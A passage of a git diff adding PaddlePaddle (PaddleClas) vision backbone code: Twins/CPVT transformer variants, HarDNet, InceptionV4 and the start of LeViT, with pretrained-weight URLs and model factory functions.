+ drop_rate=0., + attn_drop_rate=0., + drop_path_rate=0., + norm_layer=nn.LayerNorm, + depths=[3, 4, 6, 3], + sr_ratios=[8, 4, 2, 1], + block_cls=Block): + super().__init__(img_size, patch_size, in_chans, class_num, embed_dims, + num_heads, mlp_ratios, qkv_bias, qk_scale, drop_rate, + attn_drop_rate, drop_path_rate, norm_layer, depths, + sr_ratios, block_cls) + del self.pos_embeds + del self.cls_token + self.pos_block = nn.LayerList( + [PosCNN(embed_dim, embed_dim) for embed_dim in embed_dims]) + self.apply(self._init_weights) + + def _init_weights(self, m): + import math + if isinstance(m, nn.Linear): + trunc_normal_(m.weight) + if isinstance(m, nn.Linear) and m.bias is not None: + zeros_(m.bias) + elif isinstance(m, nn.LayerNorm): + zeros_(m.bias) + ones_(m.weight) + elif isinstance(m, nn.Conv2D): + fan_out = m._kernel_size[0] * m._kernel_size[1] * m._out_channels + fan_out //= m._groups + normal_(0, math.sqrt(2.0 / fan_out))(m.weight) + if m.bias is not None: + zeros_(m.bias) + elif isinstance(m, nn.BatchNorm2D): + m.weight.data.fill_(1.0) + m.bias.data.zero_() + + def forward_features(self, x): + B = x.shape[0] + + for i in range(len(self.depths)): + x, (H, W) = self.patch_embeds[i](x) + x = self.pos_drops[i](x) + + for j, blk in enumerate(self.blocks[i]): + x = blk(x, H, W) + if j == 0: + x = self.pos_block[i](x, H, W) # PEG here + + if i < len(self.depths) - 1: + x = x.reshape([B, H, W, x.shape[-1]]).transpose([0, 3, 1, 2]) + + x = self.norm(x) + return x.mean(axis=1) # GAP here + + +class PCPVT(CPVTV2): + def __init__(self, + img_size=224, + patch_size=4, + in_chans=3, + class_num=1000, + embed_dims=[64, 128, 256], + num_heads=[1, 2, 4], + mlp_ratios=[4, 4, 4], + qkv_bias=False, + qk_scale=None, + drop_rate=0., + attn_drop_rate=0., + drop_path_rate=0., + norm_layer=nn.LayerNorm, + depths=[4, 4, 4], + sr_ratios=[4, 2, 1], + block_cls=SBlock): + super().__init__(img_size, patch_size, in_chans, class_num, embed_dims, + num_heads, mlp_ratios, qkv_bias, qk_scale, drop_rate, + attn_drop_rate, drop_path_rate, norm_layer, depths, + sr_ratios, block_cls) + + +class ALTGVT(PCPVT): + """ + alias Twins-SVT + """ + + def __init__(self, + img_size=224, + patch_size=4, + in_chans=3, + class_num=1000, + embed_dims=[64, 128, 256], + num_heads=[1, 2, 4], + mlp_ratios=[4, 4, 4], + qkv_bias=False, + qk_scale=None, + drop_rate=0., + attn_drop_rate=0., + drop_path_rate=0., + norm_layer=nn.LayerNorm, + depths=[4, 4, 4], + sr_ratios=[4, 2, 1], + block_cls=GroupBlock, + wss=[7, 7, 7]): + super().__init__(img_size, patch_size, in_chans, class_num, embed_dims, + num_heads, mlp_ratios, qkv_bias, qk_scale, drop_rate, + attn_drop_rate, drop_path_rate, norm_layer, depths, + sr_ratios, block_cls) + del self.blocks + self.wss = wss + # transformer encoder + dpr = [ + x.numpy()[0] + for x in paddle.linspace(0, drop_path_rate, sum(depths)) + ] # stochastic depth decay rule + cur = 0 + self.blocks = nn.LayerList() + for k in range(len(depths)): + _block = nn.LayerList([ + block_cls( + dim=embed_dims[k], + num_heads=num_heads[k], + mlp_ratio=mlp_ratios[k], + qkv_bias=qkv_bias, + qk_scale=qk_scale, + drop=drop_rate, + attn_drop=attn_drop_rate, + drop_path=dpr[cur + i], + norm_layer=norm_layer, + sr_ratio=sr_ratios[k], + ws=1 if i % 2 == 1 else wss[k]) for i in range(depths[k]) + ]) + self.blocks.append(_block) + cur += depths[k] + self.apply(self._init_weights) + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def pcpvt_small(pretrained=False, use_ssld=False, **kwargs): + model = CPVTV2( + patch_size=4, + embed_dims=[64, 128, 320, 512], + num_heads=[1, 2, 5, 8], + mlp_ratios=[8, 8, 4, 4], + qkv_bias=True, + norm_layer=partial( + nn.LayerNorm, epsilon=1e-6), + depths=[3, 4, 6, 3], + sr_ratios=[8, 4, 2, 1], + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["pcpvt_small"], use_ssld=use_ssld) + return model + + +def pcpvt_base(pretrained=False, use_ssld=False, **kwargs): + model = CPVTV2( + patch_size=4, + embed_dims=[64, 128, 320, 512], + num_heads=[1, 2, 5, 8], + mlp_ratios=[8, 8, 4, 4], + qkv_bias=True, + norm_layer=partial( + nn.LayerNorm, epsilon=1e-6), + depths=[3, 4, 18, 3], + sr_ratios=[8, 4, 2, 1], + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["pcpvt_base"], use_ssld=use_ssld) + return model + + +def pcpvt_large(pretrained=False, use_ssld=False, **kwargs): + model = CPVTV2( + patch_size=4, + embed_dims=[64, 128, 320, 512], + num_heads=[1, 2, 5, 8], + mlp_ratios=[8, 8, 4, 4], + qkv_bias=True, + norm_layer=partial( + nn.LayerNorm, epsilon=1e-6), + depths=[3, 8, 27, 3], + sr_ratios=[8, 4, 2, 1], + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["pcpvt_large"], use_ssld=use_ssld) + return model + + +def alt_gvt_small(pretrained=False, use_ssld=False, **kwargs): + model = ALTGVT( + patch_size=4, + embed_dims=[64, 128, 256, 512], + num_heads=[2, 4, 8, 16], + mlp_ratios=[4, 4, 4, 4], + qkv_bias=True, + norm_layer=partial( + nn.LayerNorm, epsilon=1e-6), + depths=[2, 2, 10, 4], + wss=[7, 7, 7, 7], + sr_ratios=[8, 4, 2, 1], + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["alt_gvt_small"], use_ssld=use_ssld) + return model + + +def alt_gvt_base(pretrained=False, use_ssld=False, **kwargs): + model = ALTGVT( + patch_size=4, + embed_dims=[96, 192, 384, 768], + num_heads=[3, 6, 12, 24], + mlp_ratios=[4, 4, 4, 4], + qkv_bias=True, + norm_layer=partial( + nn.LayerNorm, epsilon=1e-6), + depths=[2, 2, 18, 2], + wss=[7, 7, 7, 7], + sr_ratios=[8, 4, 2, 1], + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["alt_gvt_base"], use_ssld=use_ssld) + return model + + +def alt_gvt_large(pretrained=False, use_ssld=False, **kwargs): + model = ALTGVT( + patch_size=4, + embed_dims=[128, 256, 512, 1024], + num_heads=[4, 8, 16, 32], + mlp_ratios=[4, 4, 4, 4], + qkv_bias=True, + norm_layer=partial( + nn.LayerNorm, epsilon=1e-6), + depths=[2, 2, 18, 2], + wss=[7, 7, 7, 7], + sr_ratios=[8, 4, 2, 1], + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["alt_gvt_large"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/hardnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/hardnet.py new file mode 100644 index 0000000..112dc3d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/hardnet.py @@ -0,0 +1,291 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +import paddle.nn as nn + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + 'HarDNet39_ds': + 'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/HarDNet39_ds_pretrained.pdparams', + 'HarDNet68_ds': + 'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/HarDNet68_ds_pretrained.pdparams', + 'HarDNet68': + 'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/HarDNet68_pretrained.pdparams', + 'HarDNet85': + 'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/HarDNet85_pretrained.pdparams' +} + +__all__ = MODEL_URLS.keys() + + +def ConvLayer(in_channels, + out_channels, + kernel_size=3, + stride=1, + bias_attr=False): + layer = nn.Sequential( + ('conv', nn.Conv2D( + in_channels, + out_channels, + kernel_size=kernel_size, + stride=stride, + padding=kernel_size // 2, + groups=1, + bias_attr=bias_attr)), ('norm', nn.BatchNorm2D(out_channels)), + ('relu', nn.ReLU6())) + return layer + + +def DWConvLayer(in_channels, + out_channels, + kernel_size=3, + stride=1, + bias_attr=False): + layer = nn.Sequential( + ('dwconv', nn.Conv2D( + in_channels, + out_channels, + kernel_size=kernel_size, + stride=stride, + padding=1, + groups=out_channels, + bias_attr=bias_attr)), ('norm', nn.BatchNorm2D(out_channels))) + return layer + + +def CombConvLayer(in_channels, out_channels, kernel_size=1, stride=1): + layer = nn.Sequential( + ('layer1', ConvLayer( + in_channels, out_channels, kernel_size=kernel_size)), + ('layer2', DWConvLayer( + out_channels, out_channels, stride=stride))) + return layer + + +class HarDBlock(nn.Layer): + def __init__(self, + in_channels, + growth_rate, + grmul, + n_layers, + keepBase=False, + residual_out=False, + dwconv=False): + super().__init__() + self.keepBase = keepBase + self.links = [] + layers_ = [] + self.out_channels = 0 # if upsample else in_channels + for i in range(n_layers): + outch, inch, link = self.get_link(i + 1, in_channels, growth_rate, + grmul) + self.links.append(link) + if dwconv: + layers_.append(CombConvLayer(inch, outch)) + else: + layers_.append(ConvLayer(inch, outch)) + + if (i % 2 == 0) or (i == n_layers - 1): + self.out_channels += outch + # print("Blk out =",self.out_channels) + self.layers = nn.LayerList(layers_) + + def get_link(self, layer, base_ch, growth_rate, grmul): + if layer == 0: + return base_ch, 0, [] + out_channels = growth_rate + + link = [] + for i in range(10): + dv = 2**i + if layer % dv == 0: + k = layer - dv + link.append(k) + if i > 0: + out_channels *= grmul + + out_channels = int(int(out_channels + 1) / 2) * 2 + in_channels = 0 + + for i in link: + ch, _, _ = self.get_link(i, base_ch, growth_rate, grmul) + in_channels += ch + + return out_channels, in_channels, link + + def forward(self, x): + layers_ = [x] + + for layer in range(len(self.layers)): + link = self.links[layer] + tin = [] + for i in link: + tin.append(layers_[i]) + if len(tin) > 1: + x = paddle.concat(tin, 1) + else: + x = tin[0] + out = self.layers[layer](x) + layers_.append(out) + + t = len(layers_) + out_ = [] + for i in range(t): + if (i == 0 and self.keepBase) or (i == t - 1) or (i % 2 == 1): + out_.append(layers_[i]) + out = paddle.concat(out_, 1) + + return out + + +class HarDNet(nn.Layer): + def __init__(self, + depth_wise=False, + arch=85, + class_num=1000, + with_pool=True): + super().__init__() + first_ch = [32, 64] + second_kernel = 3 + max_pool = True + grmul = 1.7 + drop_rate = 0.1 + + # HarDNet68 + ch_list = [128, 256, 320, 640, 1024] + gr = [14, 16, 20, 40, 160] + n_layers = [8, 16, 16, 16, 4] + downSamp = [1, 0, 1, 1, 0] + + if arch == 85: + # HarDNet85 + first_ch = [48, 96] + ch_list = [192, 256, 320, 480, 720, 1280] + gr = [24, 24, 28, 36, 48, 256] + n_layers = [8, 16, 16, 16, 16, 4] + downSamp = [1, 0, 1, 0, 1, 0] + drop_rate = 0.2 + + elif arch == 39: + # HarDNet39 + first_ch = [24, 48] + ch_list = [96, 320, 640, 1024] + grmul = 1.6 + gr = [16, 20, 64, 160] + n_layers = [4, 16, 8, 4] + downSamp = [1, 1, 1, 0] + + if depth_wise: + second_kernel = 1 + max_pool = False + drop_rate = 0.05 + + blks = len(n_layers) + self.base = nn.LayerList([]) + + # First Layer: Standard Conv3x3, Stride=2 + self.base.append( + ConvLayer( + in_channels=3, + out_channels=first_ch[0], + kernel_size=3, + stride=2, + bias_attr=False)) + + # Second Layer + self.base.append( + ConvLayer( + first_ch[0], first_ch[1], kernel_size=second_kernel)) + + # Maxpooling or DWConv3x3 downsampling + if max_pool: + self.base.append(nn.MaxPool2D(kernel_size=3, stride=2, padding=1)) + else: + self.base.append(DWConvLayer(first_ch[1], first_ch[1], stride=2)) + + # Build all HarDNet blocks + ch = first_ch[1] + for i in range(blks): + blk = HarDBlock(ch, gr[i], grmul, n_layers[i], dwconv=depth_wise) + ch = blk.out_channels + self.base.append(blk) + + if i == blks - 1 and arch == 85: + self.base.append(nn.Dropout(0.1)) + + self.base.append(ConvLayer(ch, ch_list[i], kernel_size=1)) + ch = ch_list[i] + if downSamp[i] == 1: + if max_pool: + self.base.append(nn.MaxPool2D(kernel_size=2, stride=2)) + else: + self.base.append(DWConvLayer(ch, ch, stride=2)) + + ch = ch_list[blks - 1] + + layers = [] + + if with_pool: + layers.append(nn.AdaptiveAvgPool2D((1, 1))) + + if class_num > 0: + layers.append(nn.Flatten()) + layers.append(nn.Dropout(drop_rate)) + layers.append(nn.Linear(ch, class_num)) + + self.base.append(nn.Sequential(*layers)) + + def forward(self, x): + for layer in self.base: + x = layer(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def HarDNet39_ds(pretrained=False, **kwargs): + model = HarDNet(arch=39, depth_wise=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HarDNet39_ds"]) + return model + + +def HarDNet68_ds(pretrained=False, **kwargs): + model = HarDNet(arch=68, depth_wise=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HarDNet68_ds"]) + return model + + +def HarDNet68(pretrained=False, **kwargs): + model = HarDNet(arch=68, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HarDNet68"]) + return model + + +def HarDNet85(pretrained=False, **kwargs): + model = HarDNet(arch=85, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HarDNet85"]) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/inception_v4.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/inception_v4.py new file mode 100644 index 0000000..e0460d4 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/inception_v4.py @@ -0,0 +1,477 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "InceptionV4": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/InceptionV4_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + padding=0, + groups=1, + act='relu', + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + bn_name = name + "_bn" + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + "_scale"), + bias_attr=ParamAttr(name=bn_name + "_offset"), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class InceptionStem(nn.Layer): + def __init__(self): + super(InceptionStem, self).__init__() + self._conv_1 = ConvBNLayer( + 3, 32, 3, stride=2, act="relu", name="conv1_3x3_s2") + self._conv_2 = ConvBNLayer(32, 32, 3, act="relu", name="conv2_3x3_s1") + self._conv_3 = ConvBNLayer( + 32, 64, 3, padding=1, act="relu", name="conv3_3x3_s1") + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0) + self._conv2 = ConvBNLayer( + 64, 96, 3, stride=2, act="relu", name="inception_stem1_3x3_s2") + self._conv1_1 = ConvBNLayer( + 160, 64, 1, act="relu", name="inception_stem2_3x3_reduce") + self._conv1_2 = ConvBNLayer( + 64, 96, 3, act="relu", name="inception_stem2_3x3") + self._conv2_1 = ConvBNLayer( + 160, 64, 1, act="relu", name="inception_stem2_1x7_reduce") + self._conv2_2 = ConvBNLayer( + 64, + 64, (7, 1), + padding=(3, 0), + act="relu", + name="inception_stem2_1x7") + self._conv2_3 = ConvBNLayer( + 64, + 64, (1, 7), + padding=(0, 3), + act="relu", + name="inception_stem2_7x1") + self._conv2_4 = ConvBNLayer( + 64, 96, 3, act="relu", name="inception_stem2_3x3_2") + self._conv3 = ConvBNLayer( + 192, 192, 3, stride=2, act="relu", name="inception_stem3_3x3_s2") + + def forward(self, inputs): + conv = self._conv_1(inputs) + conv = self._conv_2(conv) + conv = self._conv_3(conv) + + pool1 = self._pool(conv) + conv2 = self._conv2(conv) + concat = paddle.concat([pool1, conv2], axis=1) + + conv1 = self._conv1_1(concat) + conv1 = self._conv1_2(conv1) + + conv2 = self._conv2_1(concat) + conv2 = self._conv2_2(conv2) + conv2 = self._conv2_3(conv2) + conv2 = self._conv2_4(conv2) + + concat = paddle.concat([conv1, conv2], axis=1) + + conv1 = self._conv3(concat) + pool1 = self._pool(concat) + + concat = paddle.concat([conv1, pool1], axis=1) + return concat + + +class InceptionA(nn.Layer): + def __init__(self, name): + super(InceptionA, self).__init__() + self._pool = AvgPool2D(kernel_size=3, stride=1, padding=1) + self._conv1 = ConvBNLayer( + 384, 96, 1, act="relu", name="inception_a" + name + "_1x1") + self._conv2 = ConvBNLayer( + 384, 96, 1, act="relu", name="inception_a" + name + "_1x1_2") + self._conv3_1 = ConvBNLayer( + 384, 64, 1, act="relu", name="inception_a" + name + "_3x3_reduce") + self._conv3_2 = ConvBNLayer( + 64, + 96, + 3, + padding=1, + act="relu", + name="inception_a" + name + "_3x3") + self._conv4_1 = ConvBNLayer( + 384, + 64, + 1, + act="relu", + name="inception_a" + name + "_3x3_2_reduce") + self._conv4_2 = ConvBNLayer( + 64, + 96, + 3, + padding=1, + act="relu", + name="inception_a" + name + "_3x3_2") + self._conv4_3 = ConvBNLayer( + 96, + 96, + 3, + padding=1, + act="relu", + name="inception_a" + name + "_3x3_3") + + def forward(self, inputs): + pool1 = self._pool(inputs) + conv1 = self._conv1(pool1) + + conv2 = self._conv2(inputs) + + conv3 = self._conv3_1(inputs) + conv3 = self._conv3_2(conv3) + + conv4 = self._conv4_1(inputs) + conv4 = self._conv4_2(conv4) + conv4 = self._conv4_3(conv4) + + concat = paddle.concat([conv1, conv2, conv3, conv4], axis=1) + return concat + + +class ReductionA(nn.Layer): + def __init__(self): + super(ReductionA, self).__init__() + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0) + self._conv2 = ConvBNLayer( + 384, 384, 3, stride=2, act="relu", name="reduction_a_3x3") + self._conv3_1 = ConvBNLayer( + 384, 192, 1, act="relu", name="reduction_a_3x3_2_reduce") + self._conv3_2 = ConvBNLayer( + 192, 224, 3, padding=1, act="relu", name="reduction_a_3x3_2") + self._conv3_3 = ConvBNLayer( + 224, 256, 3, stride=2, act="relu", name="reduction_a_3x3_3") + + def forward(self, inputs): + pool1 = self._pool(inputs) + conv2 = self._conv2(inputs) + conv3 = self._conv3_1(inputs) + conv3 = self._conv3_2(conv3) + conv3 = self._conv3_3(conv3) + concat = paddle.concat([pool1, conv2, conv3], axis=1) + return concat + + +class InceptionB(nn.Layer): + def __init__(self, name=None): + super(InceptionB, self).__init__() + self._pool = AvgPool2D(kernel_size=3, stride=1, padding=1) + self._conv1 = ConvBNLayer( + 1024, 128, 1, act="relu", name="inception_b" + name + "_1x1") + self._conv2 = ConvBNLayer( + 1024, 384, 1, act="relu", name="inception_b" + name + "_1x1_2") + self._conv3_1 = ConvBNLayer( + 1024, + 192, + 1, + act="relu", + name="inception_b" + name + "_1x7_reduce") + self._conv3_2 = ConvBNLayer( + 192, + 224, (1, 7), + padding=(0, 3), + act="relu", + name="inception_b" + name + "_1x7") + self._conv3_3 = ConvBNLayer( + 224, + 256, (7, 1), + padding=(3, 0), + act="relu", + name="inception_b" + name + "_7x1") + self._conv4_1 = ConvBNLayer( + 1024, + 192, + 1, + act="relu", + name="inception_b" + name + "_7x1_2_reduce") + self._conv4_2 = ConvBNLayer( + 192, + 192, (1, 7), + padding=(0, 3), + act="relu", + name="inception_b" + name + "_1x7_2") + self._conv4_3 = ConvBNLayer( + 192, + 224, (7, 1), + padding=(3, 0), + act="relu", + name="inception_b" + name + "_7x1_2") + self._conv4_4 = ConvBNLayer( + 224, + 224, (1, 7), + padding=(0, 3), + act="relu", + name="inception_b" + name + "_1x7_3") + self._conv4_5 = ConvBNLayer( + 224, + 256, (7, 1), + padding=(3, 0), + act="relu", + name="inception_b" + name + "_7x1_3") + + def forward(self, inputs): + pool1 = self._pool(inputs) + conv1 = self._conv1(pool1) + + conv2 = self._conv2(inputs) + + conv3 = self._conv3_1(inputs) + conv3 = self._conv3_2(conv3) + conv3 = self._conv3_3(conv3) + + conv4 = self._conv4_1(inputs) + conv4 = self._conv4_2(conv4) + conv4 = self._conv4_3(conv4) + conv4 = self._conv4_4(conv4) + conv4 = self._conv4_5(conv4) + + concat = paddle.concat([conv1, conv2, conv3, conv4], axis=1) + return concat + + +class ReductionB(nn.Layer): + def __init__(self): + super(ReductionB, self).__init__() + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0) + self._conv2_1 = ConvBNLayer( + 1024, 192, 1, act="relu", name="reduction_b_3x3_reduce") + self._conv2_2 = ConvBNLayer( + 192, 192, 3, stride=2, act="relu", name="reduction_b_3x3") + self._conv3_1 = ConvBNLayer( + 1024, 256, 1, act="relu", name="reduction_b_1x7_reduce") + self._conv3_2 = ConvBNLayer( + 256, + 256, (1, 7), + padding=(0, 3), + act="relu", + name="reduction_b_1x7") + self._conv3_3 = ConvBNLayer( + 256, + 320, (7, 1), + padding=(3, 0), + act="relu", + name="reduction_b_7x1") + self._conv3_4 = ConvBNLayer( + 320, 320, 3, stride=2, act="relu", name="reduction_b_3x3_2") + + def forward(self, inputs): + pool1 = self._pool(inputs) + + conv2 = self._conv2_1(inputs) + conv2 = self._conv2_2(conv2) + + conv3 = self._conv3_1(inputs) + conv3 = self._conv3_2(conv3) + conv3 = self._conv3_3(conv3) + conv3 = self._conv3_4(conv3) + + concat = paddle.concat([pool1, conv2, conv3], axis=1) + + return concat + + +class InceptionC(nn.Layer): + def __init__(self, name=None): + super(InceptionC, self).__init__() + self._pool = AvgPool2D(kernel_size=3, stride=1, padding=1) + self._conv1 = ConvBNLayer( + 1536, 256, 1, act="relu", name="inception_c" + name + "_1x1") + self._conv2 = ConvBNLayer( + 1536, 256, 1, act="relu", name="inception_c" + name + "_1x1_2") + self._conv3_0 = ConvBNLayer( + 1536, 384, 1, act="relu", name="inception_c" + name + "_1x1_3") + self._conv3_1 = ConvBNLayer( + 384, + 256, (1, 3), + padding=(0, 1), + act="relu", + name="inception_c" + name + "_1x3") + self._conv3_2 = ConvBNLayer( + 384, + 256, (3, 1), + padding=(1, 0), + act="relu", + name="inception_c" + name + "_3x1") + self._conv4_0 = ConvBNLayer( + 1536, 384, 1, act="relu", name="inception_c" + name + "_1x1_4") + self._conv4_00 = ConvBNLayer( + 384, + 448, (1, 3), + padding=(0, 1), + act="relu", + name="inception_c" + name + "_1x3_2") + self._conv4_000 = ConvBNLayer( + 448, + 512, (3, 1), + padding=(1, 0), + act="relu", + name="inception_c" + name + "_3x1_2") + self._conv4_1 = ConvBNLayer( + 512, + 256, (1, 3), + padding=(0, 1), + act="relu", + name="inception_c" + name + "_1x3_3") + self._conv4_2 = ConvBNLayer( + 512, + 256, (3, 1), + padding=(1, 0), + act="relu", + name="inception_c" + name + "_3x1_3") + + def forward(self, inputs): + pool1 = self._pool(inputs) + conv1 = self._conv1(pool1) + + conv2 = self._conv2(inputs) + + conv3 = self._conv3_0(inputs) + conv3_1 = self._conv3_1(conv3) + conv3_2 = self._conv3_2(conv3) + + conv4 = self._conv4_0(inputs) + conv4 = self._conv4_00(conv4) + conv4 = self._conv4_000(conv4) + conv4_1 = self._conv4_1(conv4) + conv4_2 = self._conv4_2(conv4) + + concat = paddle.concat( + [conv1, conv2, conv3_1, conv3_2, conv4_1, conv4_2], axis=1) + + return concat + + +class InceptionV4DY(nn.Layer): + def __init__(self, class_num=1000): + super(InceptionV4DY, self).__init__() + self._inception_stem = InceptionStem() + + self._inceptionA_1 = InceptionA(name="1") + self._inceptionA_2 = InceptionA(name="2") + self._inceptionA_3 = InceptionA(name="3") + self._inceptionA_4 = InceptionA(name="4") + self._reductionA = ReductionA() + + self._inceptionB_1 = InceptionB(name="1") + self._inceptionB_2 = InceptionB(name="2") + self._inceptionB_3 = InceptionB(name="3") + self._inceptionB_4 = InceptionB(name="4") + self._inceptionB_5 = InceptionB(name="5") + self._inceptionB_6 = InceptionB(name="6") + self._inceptionB_7 = InceptionB(name="7") + self._reductionB = ReductionB() + + self._inceptionC_1 = InceptionC(name="1") + self._inceptionC_2 = InceptionC(name="2") + self._inceptionC_3 = InceptionC(name="3") + + self.avg_pool = AdaptiveAvgPool2D(1) + self._drop = Dropout(p=0.2, mode="downscale_in_infer") + stdv = 1.0 / math.sqrt(1536 * 1.0) + self.out = Linear( + 1536, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="final_fc_weights"), + bias_attr=ParamAttr(name="final_fc_offset")) + + def forward(self, inputs): + x = self._inception_stem(inputs) + + x = self._inceptionA_1(x) + x = self._inceptionA_2(x) + x = self._inceptionA_3(x) + x = self._inceptionA_4(x) + x = self._reductionA(x) + + x = self._inceptionB_1(x) + x = self._inceptionB_2(x) + x = self._inceptionB_3(x) + x = self._inceptionB_4(x) + x = self._inceptionB_5(x) + x = self._inceptionB_6(x) + x = self._inceptionB_7(x) + x = self._reductionB(x) + + x = self._inceptionC_1(x) + x = self._inceptionC_2(x) + x = self._inceptionC_3(x) + + x = self.avg_pool(x) + x = paddle.squeeze(x, axis=[2, 3]) + x = self._drop(x) + x = self.out(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def InceptionV4(pretrained=False, use_ssld=False, **kwargs): + model = InceptionV4DY(**kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["InceptionV4"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/levit.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/levit.py new file mode 100644 index 0000000..a797333 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/levit.py @@ -0,0 +1,587 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import itertools +import math +import warnings + +import paddle +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn.initializer import TruncatedNormal, Constant +from paddle.regularizer import L2Decay + +from .vision_transformer import trunc_normal_, zeros_, ones_, Identity + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "LeViT_128S": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/LeViT_128S_pretrained.pdparams", + "LeViT_128": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/LeViT_128_pretrained.pdparams", + "LeViT_192": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/LeViT_192_pretrained.pdparams", + "LeViT_256": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/LeViT_256_pretrained.pdparams", + "LeViT_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/LeViT_384_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +def cal_attention_biases(attention_biases, attention_bias_idxs): + gather_list = [] + attention_bias_t = paddle.transpose(attention_biases, (1, 0)) + nums = attention_bias_idxs.shape[0] + for idx in range(nums): + gather = paddle.gather(attention_bias_t, attention_bias_idxs[idx]) + gather_list.append(gather) + shape0, shape1 = attention_bias_idxs.shape + gather = paddle.concat(gather_list) + return paddle.transpose(gather, (1, 0)).reshape((0, shape0, shape1)) + + +class Conv2d_BN(nn.Sequential): + def __init__(self, + a, + b, + ks=1, + stride=1, + pad=0, + 